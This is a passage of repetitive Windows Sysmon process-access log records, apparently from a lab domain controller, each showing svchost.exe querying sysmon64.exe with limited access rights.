0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5172,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5173,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5174,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5175,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5176,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5177,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5178,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5179,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 